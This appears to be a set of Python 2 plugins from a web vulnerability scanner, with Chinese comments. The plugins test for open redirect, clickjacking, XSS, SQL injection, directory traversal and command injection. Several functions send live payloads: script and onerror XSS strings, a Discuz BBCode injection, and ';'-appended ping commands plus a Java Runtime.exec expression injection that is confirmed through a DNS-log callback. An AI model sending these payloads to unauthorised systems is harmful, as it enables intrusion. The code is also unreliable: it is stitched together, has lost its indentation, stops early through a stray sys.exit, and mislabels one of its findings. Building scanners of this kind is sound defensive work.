def run_url(http, ob, item):
header = {
"Host": ob['domain'],
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Referer": item['refer'],
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
# "Cookie": ob.get('cookie')
}
try:
path = item['url']
method = item['method']
timeout = ob.get('webTimeout')
http = Http(timeout=timeout)
url_parse = urlparse(path)
netloc = url_parse.netloc
source_ip = ob.get('source_ip')
if source_ip:
netloc = source_ip
query_dict = post_query2dict(path)
result = []
for key in query_dict.keys():
url2 = getDomain(query_dict[key])
print url2
if url2:
query_dict[key] = 'http://openresty.org/cn/'
print(query_dict[key])
new_query = dict2query(query_dict)
new_url = "%s://%s%s?%s" % (url_parse.scheme, netloc, url_parse.path,
new_query)
# print new_url
res, content = http.request(new_url, 'GET', headers=header)
c = re.search('''OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。''', content)
if c:
response = getResponse(res, content,
'OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。')
request = getRequest(path,
'POST',
headers=header,
domain=ob['domain'])
detail = "存在任意网址跳转漏洞"
result.append(
getRecord(ob, path, ob['level'], detail, request, response))
return result
except Exception, e:
logger.error("File:PageredirectsScript_yd.py, run_url function :%s" %
(str(e)))
return result
def run_url(http, config, item):
'''
重写run_url函数,实现检测SQL注入的功能
有异常时,直接输出异常
无异常时,以list类型返回检测结果记录
'''
try:
#重新组织请求的参数
scanInfo = {}
scanInfo['siteId'] = config['siteId']
scanInfo['ip'] = config['ip']
scanInfo['domain'] = config['domain']
scanInfo['level'] = config['level']
scanInfo['vulId'] = config['vulId']
headers = headerDictDefault
headers['cookie'] = config['cookie']
headers['Host'] = config['domain']
source_ip = config.get('source_ip')
responseList = []
url = item['url']
url_parse = urlparse.urlparse(url)
scheme = url_parse.scheme
domain = url_parse.netloc
path = url_parse.path
query = url_parse.query
if source_ip:
domain = source_ip
if query:
new_url = "%s://%s%s?%s" % (scheme, domain, path, query)
else:
new_url = "%s://%s%s" % (scheme, domain, path)
if item['method'].lower() == 'get': #get
url = "%s?%s" % (new_url, item['params'])
bodyDict={}
else: #post
url = new_url
bodyDict = db_params2dict(item['params'])
urlBase, queryDict = post_all_query2dict(item['url'])
response = request(url=url, body=dict2query(bodyDict), headers=headers, method=item['method'])
pattern = r'<iframe.*?src="(.*?)"'
matches = re.findall(pattern, response['response_body'])
for row in matches:
parse = urlparse.urlparse(row)
if scanInfo['domain'] != parse.netloc:
injectInfo = returnInjectResult(url=url, confirm=0, detail='点击劫持,iframe连接到了外站', response=response)
responseList.append(getRecord2(scanInfo, injectInfo))
return responseList
else:
print scanInfo['domain'], parse.netloc
except Exception,e:
logger.error("File:ClickJacking_iframe.py, run_url function :%s" % (str(e)))
return []
def run_url(http, ob, item):
method = item.get('method')
method = method.lower()
if method not in ['get', 'post']:
return []
params = item.get('params')
inj_list = [
# '''<sCrIpt>alert(123)</ScRiPt>''',
# ''''><sCrIpt>alert(123)</ScRiPt>''',
# '''"><sCrIpt>alert(123)</ScRiPt>''',
# '''';</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''',
# '''";</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''',
'''-->''''''"""""">>>>>>;;;;;;</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''',
'''-->''''''"""""">>>>>>;;;;;;<source%20onerror="javascript:alert(123)">''',
'''-->''''''"""""">>>>>>;;;;;;<img src=1 onerror=alert(1)>'''
]
url = item['url']
scheme = ob['scheme']
domain = ob['domain']
header = {'Host': domain}
source_ip = ob.get('source_ip')
if source_ip:
domain = source_ip
url_path = urlparse.urlparse(url).path
result = []
re_obj = re.compile('(<script>alert\(123\)</script>|javascript:alert\(123\)">|onerror=alert\(1\)>)')
detail = "检测到XSS漏洞"
try:
# get 方法
if method == 'get':
# 没有参数,就直接路径注入
if not params:
for payload in inj_list:
if not url_path or url_path[-1] != '/':
payload = '/' + payload
new_url = '%s://%s%s%s' % (scheme, domain, url_path, payload)
res, content = http.request(url=new_url, method='GET', headers=header)
if re_obj.search(content, re.I):
request = getRequest(new_url, domain=ob['domain'])
response = getResponse(res, content)
result.append(getRecord(ob, new_url, ob['level'], detail, request, response))
# 有参数就参数注入,query注入
else:
query_dict = query2dict(params)
for payload in inj_list:
for k, v in query_dict.iteritems():
query_dict_cp = deepcopy(query_dict)
if v:
query_dict_cp[k] = str(v) + payload
else:
query_dict_cp[k] = '1' + payload
new_query = dict2query(params_dict=query_dict_cp, isUrlEncode=True)
new_url = '%s://%s%s?%s' % (scheme, domain, url_path, new_query)
res, content = http.request(url=new_url, method='GET', headers=header)
# if res.get('status') and res.get('status') == '200':
if re_obj.search(content, re.I):
request = getRequest(new_url, domain=ob['domain'])
response = getResponse(res, content)
result.append(getRecord(ob, new_url, ob['level'], detail, request, response))
# post 方法
else:
query = urlparse.urlparse(url).query
body = item.get('params')
# query 部分注入,body不变
if query:
body_str = None
if body:
body_dict = db_params2dict(body)
body_str = dict2query(params_dict=body_dict, isUrlEncode=False)
query_dict = query2dict(query)
for payload in inj_list:
for k, v in query_dict.iteritems():
query_dict_cp = deepcopy(query_dict)
if v:
query_dict_cp[k] = str(v) + payload
else:
query_dict_cp[k] = '1' + payload
new_query = dict2query(params_dict=query_dict_cp, isUrlEncode=True)
new_url = '%s://%s%s?%s' % (scheme, domain, url_path, new_query)
res, content = http.request(url=new_url, method='POST', headers=header, body=body_str)
# if res.get('status') and res.get('status') == '200':
if re_obj.search(content, re.I):
request = postRequest(new_url, domain=ob['domain'])
response = getResponse(res, content)
result.append(getRecord(ob, new_url, ob['level'], detail, request, response))
# body部分注入,query不变
if body:
params_dict = db_params2dict(body)
for payload in inj_list:
for k, v in params_dict.iteritems():
params_dict_cp = deepcopy(params_dict)
if v:
params_dict_cp[k] = str(v) + payload
else:
params_dict_cp[k] = '1' + payload
new_params = dict2query(params_dict=params_dict_cp, isUrlEncode=False)
new_url = '%s://%s%s?%s' % (scheme, domain, url_path, query)
res, content = http.request(url=new_url, method='POST', headers=header, body=new_params)
# if res.get('status') and res.get('status') == '200':
if re_obj.search(content, re.I):
request = postRequest(new_url, domain=ob['domain'])
response = getResponse(res, content)
result.append(getRecord(ob, new_url, ob['level'], detail, request, response))
except Exception, e:
logger.error("File:xss_inject_new.py, run_url function get method:%s" % (str(e)))
def run_domain(http, config):
'''
重写run_url函数,实现检测SQL注入的功能
有异常时,直接输出异常
无异常时,以list类型返回检测结果记录
'''
# 重新组织请求的参数
scanInfo = {}
scanInfo['siteId'] = config['siteId']
scanInfo['ip'] = config['ip']
scanInfo['scheme'] = config['scheme']
scanInfo['domain'] = config['domain']
scanInfo['level'] = config['level']
scanInfo['vulId'] = config['vulId']
# headers = headerDictDefault
headers = {
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
# 'Host': 'discuzx15.target.safety.local.com',
'Cache-Control': 'max-age=0',
'Host': config['domain']
}
headers['cookie'] = config['cookie']
# print scanInfo
responseList = []
try:
source_ip = config.get('source_ip')
if source_ip:
urlBase = scanInfo['scheme'] + "://" + source_ip
else:
urlBase = scanInfo['scheme'] + "://" + scanInfo['domain']
urlForum = urlBase + "/forum.php"
response = request(url=urlForum, headers=headers, method="GET")
# 状态码不正确,退出
if response['httpcode'] != 200:
return []
# patternForumid = re.compile(r'<td\sclass\="fl_icn"\s*><a\shref\=".*?mod\=forumdisplay&fid\=(.*?)"', re.I|re.M|re.S)
patternForumid = re.compile(r'<a\shref\=".*?mod\=forumdisplay&fid\=(.*?)"', re.I | re.M | re.S)
tmpResult = patternForumid.findall(response['response_body'])
# print response['response_body']
# print response['response_headers']
# 没有找到相应的版块,程序退出
if not tmpResult:
return []
forumids = list(set(tmpResult))
forumid = forumids[0]
newthreadUrl = urlBase + "/forum.php?mod=post&action=newthread&fid=" + forumid
headers['Referer'] = urlBase + "/forum.php?mod=forumdisplay&fid=" + forumid
response = request(url=newthreadUrl, headers=headers, method="GET")
# print response['httpcode']
if response['httpcode'] != 200:
return []
print response['response_body']
# print len(newthreadUrl), newthreadUrl
# print headers
# print response['httpcode']
# patternForumhash = re.compile(r'<input.*?name\="formhash"\sid\="formhash"\svalue\="(.*?)"', re.I|re.M|re.S)
# patternPosttime = re.compile(r'<input.*?name\="posttime"\sid\="posttime"\svalue\="(.*?)"', re.I|re.M|re.S)
# tmpForumhash = patternForumhash.findall(response['response_body'])
# tmpPosttime = patternPosttime.findall(response['response_body'])
tmpForumhash = re.compile(r'<input.*?name\="formhash"\sid\="formhash"\svalue\="(.*?)"',
re.I | re.M | re.S).findall(response['response_body'])
tmpPosttime = re.compile(r'<input.*?name\="posttime"\sid\="posttime"\svalue\="(.*?)"',
re.I | re.M | re.S).findall(response['response_body'])
# tmpTid = re.compile(r'<input\s+type="hidden"\s+name\="tid"\s+value\="(.*?)"', re.I|re.M|re.S).findall(response['response_body'])
# patternTid = re.compile(r'name\="tid"\svalue\="(.*?)"', re.I|re.M|re.S)
# patternTid = re.compile(r'"tid"\s*value\="(.*?)"', re.I)
# tmpTid = patternTid.findall(response['response_body'])
# tmpPid = re.compile(r'<input\s+type="hidden"\s+name\="pid"\s+value\="(.*?)"', re.I|re.M|re.S).findall(response['response_body'])
# tmpPage = re.compile(r'<input\s+type="hidden"\s+name\="page"\s+value\="(.*?)"', re.I|re.M|re.S).findall(response['response_body'])
print tmpForumhash
print tmpPosttime
# print tmpTid
# print tmpPid
# print tmpPage
# sys.exit(1)
formdata = {}
formdata['forumhash'] = tmpForumhash[0]
formdata['posttime'] = tmpPosttime[0]
formdata['subject'] = '这里是测试xss_bbcode帖子'
formdata['message'] = '[email=2"onmouseover="alert(\'tester_xss_bbcode\')]2[/email]'
formdata['wysiwyg'] = '1'
formdata['fid'] = forumid
# formdata['tid'] = tmpTid[0]
# formdata['pid'] = tmpPid[0]
# formdata['page'] = tmpPage[0]
formdata['checkbox'] = 0
postUrl = urlBase + "/forum.php?mod=post&action=newthread&fid=" + forumid + "&extra=&topicsubmit=yes"
body = dict2query(formdata)
headers['Referer'] = newthreadUrl
response = request(url=postUrl, body=body, headers=headers, method="POST")
# print response
if response['httpcode'] != 200:
return []
print response['response_body']
sys.exit(1)
patternEdit = re.compile(r'<a\sclass\="editp"\shref\s="(.*?)">编辑<\/a>', re.I | re.M | re.S)
patternEdit.findall(response['response_body'])
response = request(url=postUrl, headers=headers, method="GET")
patternXssBbcode = re.compile(r'alert\(\'tester_xss_bbcode\'\)', re.I | re.M | re.S)
match = patternXssBbcode.match(response['response_body'])
if match:
injectInfo = returnInjectResult(url=urlBase, confirm=1,
detail="Discuz! X1-1.5 的 notify_credit.php 文件由于没有对用户输入进行有效的过滤导致存在SQL盲注",
response=response)
responseList.append(getRecord2(scanInfo, injectInfo))
return responseList
except Exception, e:
logger.error("File:DiscuzX15_notify_credit.py:" + str(e))
def run_inj(http, ob, item, payloads, inj_type=None):
method = item.get('method')
if not method:
return []
method = method.lower()
if method not in ['get', 'post']:
return []
params = item.get('params')
if not params:
return []
url = item['url']
scheme = ob['scheme']
domain = ob['domain']
header = {'Host': domain}
source_ip = ob.get('source_ip')
if source_ip:
domain = source_ip
url_path = urlparse.urlparse(url).path
result = []
try:
# get 方法
if method.lower() == 'get':
query_dict = query2dict(params)
for k, v in query_dict.iteritems():
query_dict_cp = deepcopy(query_dict)
payload_t, payload_f = payloads
if v:
query_dict_cp[k] = v + payload_t
else:
query_dict_cp[k] = '1' + payload_t
query_t = dict2query(params_dict=query_dict_cp,
isUrlEncode=True)
if v:
query_dict_cp[k] = v + payload_f
else:
query_dict_cp[k] = '1' + payload_f
query_f = dict2query(params_dict=query_dict_cp,
isUrlEncode=True)
url_t = '%s://%s%s?%s' % (scheme, domain, url_path, query_t)
url_f = '%s://%s%s?%s' % (scheme, domain, url_path, query_f)
res_t, content_t = http.request(url=url_t,
method='GET',
headers=header)
res_f, content_f = http.request(url=url_f,
method='GET',
headers=header)
status_t = res_t.get('status', '0')
status_f = res_f.get('status', '0')
if "ERROR型" == inj_type:
res_d, db_type_d, msg_d = check_db_error(content_t)
# if res_d or (status_t == '500' and not page_similar(res_t.get('status'), content_t, ob.get('waf_page'))):
if res_d:
detail = "检测到 %s sql注入漏洞" % inj_type
request = getRequest(url_t, domain=ob['domain'])
response = getResponse(res_t, content_t)
# logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
# status_t, status_f, content_t, content_f))
result.append(
getRecord(ob, url_t, ob['level'], detail, request,
response))
else:
res_s, db_type_s, msg_s = check_db_error(content_f)
# if res_s or (status_f == '500' and not page_similar(res_f.get('status'), content_f, ob.get('waf_page'))):
if res_s:
detail = "检测到 %s sql注入漏洞" % inj_type
request = getRequest(url_f, domain=ob['domain'])
response = getResponse(res_f, content_f)
# logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
# status_t, status_f, content_t, content_f))
result.append(
getRecord(ob, url_f, ob['level'], detail,
request, response))
else:
similar = check_page_similar(status1=status_t,
content1=content_t,
status2=status_f,
content2=content_f)
similar_waf = page_similar(status_t, content_t,
ob.get('waf_page'))
if not similar and not similar_waf:
detail = "检测到 %s sql注入漏洞" % inj_type
logger.error(
"status_t:%s, status_f:%s, content_t:%s, content_f:%s"
% (status_t, status_f, content_t, content_f))
request = getRequest(url_f, domain=ob['domain'])
response = getResponse(res_f, content_f)
# logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
# status_t, status_f, content_t, content_f))
result.append(
getRecord(ob, url_f, ob['level'], detail, request,
response))
# post 方法
else:
query = urlparse.urlparse(url).query
body = item.get('params')
# query 部分注入,body不变
if query:
body_str = ''
if body:
body_dict = db_params2dict(body)
body_str = dict2query(params_dict=body_dict,
isUrlEncode=True)
query_dict = query2dict(query)
for k, v in query_dict.iteritems():
query_dict_cp = deepcopy(query_dict)
payload_t, payload_f = payloads
if v:
query_dict_cp[k] = v + payload_t
else:
query_dict_cp[k] = '1' + payload_t
query_t = dict2query(params_dict=query_dict_cp,
isUrlEncode=True)
if v:
query_dict_cp[k] = v + payload_f
else:
query_dict_cp[k] = '1' + payload_f
query_f = dict2query(params_dict=query_dict_cp,
isUrlEncode=True)
url_t = '%s://%s%s?%s' % (scheme, domain, url_path,
query_t)
url_f = '%s://%s%s?%s' % (scheme, domain, url_path,
query_f)
res_t, content_t = http.request(url=url_t,
method='POST',
headers=header,
body=body_str)
res_f, content_f = http.request(url=url_f,
method='POST',
headers=header,
body=body_str)
status_t = res_t.get('status', '0')
status_f = res_f.get('status', '0')
if "ERROR型" == inj_type:
res_d, db_type_d, msg_d = check_db_error(content_t)
# if res_d or (status_t == '500' and not page_similar(res_t.get('status'), content_t, ob.get('waf_page'))):
if res_d:
detail = "检测到 %s sql注入漏洞" % inj_type
request = postRequest(url_t,
body=body_str,
domain=ob['domain'])
response = getResponse(res_t, content_t)
# logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
# status_t, status_f, content_t, content_f))
result.append(
getRecord(ob, url_t, ob['level'], detail,
request, response))
else:
res_s, db_type_s, msg_s = check_db_error(content_f)
# if res_s or (status_f == '500' and not page_similar(res_f.get('status'), content_f, ob.get('waf_page'))):
if res_s:
detail = "检测到 %s sql注入漏洞" % inj_type
request = postRequest(url_t,
body=body_str,
domain=ob['domain'])
response = getResponse(res_f, content_f)
# logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
# status_t, status_f, content_t, content_f))
result.append(
getRecord(ob, url_f, ob['level'], detail,
request, response))
else:
similar = check_page_similar(status1=status_t,
content1=content_t,
status2=status_f,
content2=content_f)
similar_waf = page_similar(status_t, content_t,
ob.get('waf_page'))
if not similar and similar_waf:
detail = "检测到 %s sql注入漏洞" % inj_type
request = postRequest(url_t,
body=body_str,
domain=ob['domain'])
response = getResponse(res_f, content_f)
# logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
# status_t, status_f, content_t, content_f))
result.append(
getRecord(ob, url_f, ob['level'], detail,
request, response))
# body部分注入,query不变
if body:
params_dict = db_params2dict(body)
for k, v in params_dict.iteritems():
params_dict_cp = deepcopy(params_dict)
payload_t, payload_f = payloads
if v:
params_dict_cp[k] = v + payload_t
else:
params_dict_cp[k] = '1' + payload_t
params_t = dict2query(params_dict=params_dict_cp,
isUrlEncode=True)
if v:
params_dict_cp[k] = v + payload_f
else:
params_dict_cp[k] = '1' + payload_f
params_f = dict2query(params_dict=params_dict_cp,
isUrlEncode=True)
new_url = '%s://%s%s?%s' % (scheme, domain, url_path,
query)
res_t, content_t = http.request(url=new_url,
method='POST',
headers=header,
body=params_t)
res_f, content_f = http.request(url=new_url,
method='POST',
headers=header,
body=params_f)
status_t = res_t.get('status', '0')
status_f = res_f.get('status', '0')
if "ERROR型" == inj_type:
res_d, db_type_d, msg_d = check_db_error(content_t)
# if res_d or (status_t == '500' and not page_similar(res_t.get('status'), content_t, ob.get('waf_page'))):
if res_d:
detail = "检测到 %s sql注入漏洞" % inj_type
request = postRequest(new_url,
body=params_t,
domain=ob['domain'])
response = getResponse(res_t, content_t)
# logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
# status_t, status_f, content_t, content_f))
result.append(
getRecord(ob, new_url, ob['level'], detail,
request, response))
else:
res_s, db_type_s, msg_s = check_db_error(content_f)
# if res_s or (status_f == '500' and not page_similar(res_f.get('status'), content_f, ob.get('waf_page'))):
if res_s:
detail = "检测到 %s sql注入漏洞" % inj_type
request = postRequest(new_url,
body=params_f,
domain=ob['domain'])
response = getResponse(res_f, content_f)
# logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
# status_t, status_f, content_t, content_f))
result.append(
getRecord(ob, new_url, ob['level'], detail,
request, response))
else:
similar = check_page_similar(status1=status_t,
content1=content_t,
status2=status_f,
content2=content_f)
similar_waf = page_similar(status_t, content_t,
ob.get('waf_page'))
if not similar and similar_waf:
detail = "检测到 %s sql注入漏洞" % inj_type
request = postRequest(new_url,
body=params_f,
domain=ob['domain'])
response = getResponse(res_f, content_f)
# logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
# status_t, status_f, content_t, content_f))
result.append(
getRecord(ob, new_url, ob['level'], detail,
request, response))
except Exception, e:
logger.error("File:sql_inject_new.py, run_url function:%s" % (str(e)))
def run_url(http, ob, item):
header = {
"Pragma": "no-cache",
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Cache-Control": "no-cache",
"Cookie": ob.get('cookie') if ob.get('cookie') else '',
"Connection": "keep-alive",
"Host": ob['domain']
}
result = []
try:
url = item.get('url')
params = item.get('params')
method = item.get('method')
source_ip = ob.get('source_ip')
url_parse = urlparse(url)
scheme = url_parse.scheme
domain = url_parse.netloc
path = url_parse.path
query = url_parse.query
if source_ip:
domain = source_ip
# 没有参数就不扫
if not params and not query:
return []
# get方法
if method.lower() == 'get':
if params:
query = params
if query and re.search('page|download|path|file|target', query,
re.I):
query_dict = query2dict(query)
for key in query_dict.keys():
if re.search('page|download|path|file|target', key, re.I):
for inj_value in inj_path_list:
query_bak = deepcopy(query_dict)
query_bak[key] = inj_value
new_query = dict2query(query_bak,
isUrlEncode=False)
new_url = "%s://%s%s?%s" % (scheme, domain, path,
new_query)
data = traversal_params(ob, http, new_url, 'GET',
'', header)
if data:
result.extend(data)
break
elif method.lower() == 'post':
body_dict = db_params2dict(params)
# 注入query,body不变
if query and re.search('page|download|path|file|target', query,
re.I):
query_dict = query2dict(query)
for key in query_dict.keys():
if re.search('page|download|path|file|target', key, re.I):
for inj_value in inj_path_list:
query_bak = deepcopy(query_dict)
query_bak[key] = inj_value
new_query = dict2query(query_bak,
isUrlEncode=False)
new_url = "%s://%s%s?%s" % (scheme, domain, path,
new_query)
data = traversal_params(
ob, http, new_url, 'POST',
dict2query(body_dict, isUrlEncode=False),
header)
if data:
result.extend(data)
break
if body_dict and re.search('page|download|path|file|target',
str(params), re.I):
new_url = "%s://%s%s?%s" % (scheme, domain, path, query)
for key in body_dict.keys():
if re.search('page|download|path|file|target', key, re.I):
for inj_value in inj_path_list:
body_bak = deepcopy(body_dict)
body_bak[key] = inj_value
new_body = dict2query(body_bak, isUrlEncode=False)
data = traversal_params(ob, http, new_url, 'POST',
new_body, header)
if data:
result.extend(data)
break
except Exception, e:
logger.error("File:dir_traversal_win_url.py, run_url function :%s" %
(str(e)))
def run_url(http, ob, item):
result = []
try:
method = item['method']
domain = ob['domain']
header = {
'Host': domain,
'Cookie': ob['cookie'] if ob['cookie'] else ''
}
source_ip = ob.get('source_ip')
url = item['url']
params = item['params']
# p1 = r'\bexec\b|command|\bcmd\b'
# p2 = r'command|\bcmd\b'
# if not params:
# return result
# if not (re.search(p1, url, re.I) or re.search(p2, params, re.I|re.M)):
# return result
url_parse = urlparse(url)
scheme = url_parse.scheme
domain = url_parse.netloc
path = url_parse.path
query = url_parse.query
if source_ip:
domain = source_ip
# if query:
# url = "%s://%s%s?%s" % (scheme, domain, path, query)
# else:
# url = "%s://%s%s" % (scheme, domain, path)
# get 方法
if method.lower() == 'get':
query_dict = query2dict(params)
for k, v in query_dict.items():
random_str, ping_cmd_list = _cmd_poc()
for ping_cmd in ping_cmd_list:
query_dict_cp = deepcopy(query_dict)
if v:
query_dict_cp[k] = v + ';' + ping_cmd
else:
query_dict_cp[k] = ';' + ping_cmd
query_cmd = dict2query(params_dict=query_dict_cp,
isUrlEncode=True)
cmd_url = '%s://%s%s?%s' % (scheme, domain, path,
query_cmd)
res, content = http.request(url=cmd_url,
method='GET',
headers=header)
if callback(random_str):
detail = "通过dns log检测到命令执行漏洞"
request = getRequest(cmd_url, domain=ob['domain'])
response = getResponse(res)
result.append(
getRecord(ob, cmd_url, ob['level'], detail,
request, response))
break
# 增加参数名注入检测
kk = query_dict.keys()[0]
vv = query_dict[kk]
random_str, ping_cmd_list = _cmd_poc()
for ping_cmd in ping_cmd_list:
kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % (
kk, ping_cmd)
cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" %
(kk, vv))
res, content = http.request(url=cmd_url,
method='GET',
headers=header)
if callback(random_str):
detail = "通过dns log检测到命令执行漏洞"
request = getRequest(cmd_url, domain=ob['domain'])
response = getResponse(res)
result.append(
getRecord(ob, cmd_url, ob['level'], detail, request,
response))
break
else:
body = params
# query 部分注入,body不变
if query:
body_str = ''
if body:
body_dict = db_params2dict(body)
body_str = dict2query(params_dict=body_dict,
isUrlEncode=True)
query_dict = query2dict(params)
for k, v in query_dict.items():
random_str, ping_cmd_list = _cmd_poc()
for ping_cmd in ping_cmd_list:
query_dict_cp = deepcopy(query_dict)
if v:
query_dict_cp[k] = v + ';' + ping_cmd
else:
query_dict_cp[k] = ';' + ping_cmd
query_cmd = dict2query(params_dict=query_dict_cp,
isUrlEncode=True)
cmd_url = '%s://%s%s?%s' % (scheme, domain, path,
query_cmd)
res, content = http.request(url=cmd_url,
method='POST',
body=body_str,
headers=header)
if callback(random_str):
detail = "通过dns log检测到命令执行漏洞"
request = getRequest(cmd_url, domain=ob['domain'])
response = getResponse(res)
result.append(
getRecord(ob, cmd_url, ob['level'], detail,
request, response))
break
# 增加参数名注入检测
kk = query_dict.keys()[0]
vv = query_dict[kk]
random_str, ping_cmd_list = _cmd_poc()
for ping_cmd in ping_cmd_list:
kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % (
kk, ping_cmd)
cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" %
(kk, vv))
res, content = http.request(url=cmd_url,
method='GET',
headers=header)
if callback(random_str):
detail = "通过dns log检测到命令执行漏洞"
request = getRequest(cmd_url, domain=ob['domain'])
response = getResponse(res)
result.append(
getRecord(ob, cmd_url, ob['level'], detail,
request, response))
break
if body:
params_dict = db_params2dict(body)
for k, v in params_dict.iteritems():
random_str, ping_cmd_list = _cmd_poc()
for ping_cmd in ping_cmd_list:
params_dict_cp = deepcopy(params_dict)
if v:
params_dict_cp[k] = v + ';' + ping_cmd
else:
params_dict_cp[k] = ';' + ping_cmd
params_cmd = dict2query(params_dict=params_dict_cp,
isUrlEncode=True)
cmd_url = '%s://%s%s?%s' % (scheme, domain, path,
query)
res, content = http.request(url=cmd_url,
method='POST',
body=params_cmd,
headers=header)
if callback(random_str):
detail = "通过dns log检测到命令执行漏洞"
request = getRequest(cmd_url, domain=ob['domain'])
response = getResponse(res)
result.append(
getRecord(ob, cmd_url, ob['level'], detail,
request, response))
break
# 增加参数名注入检测
kk = params_dict.keys()[0]
vv = params_dict[kk]
random_str, ping_cmd_list = _cmd_poc()
for ping_cmd in ping_cmd_list:
kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % (
kk, ping_cmd)
cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" %
(kk, vv))
res, content = http.request(url=cmd_url,
method='GET',
headers=header)
if callback(random_str):
detail = "通过dns log检测到命令执行漏洞"
request = getRequest(cmd_url, domain=ob['domain'])
response = getResponse(res)
result.append(
getRecord(ob, cmd_url, ob['level'], detail,
request, response))
break
except Exception, e:
logger.error("File:exec_cmd_dns_log.py, run_domain function :%s" %
(str(e)))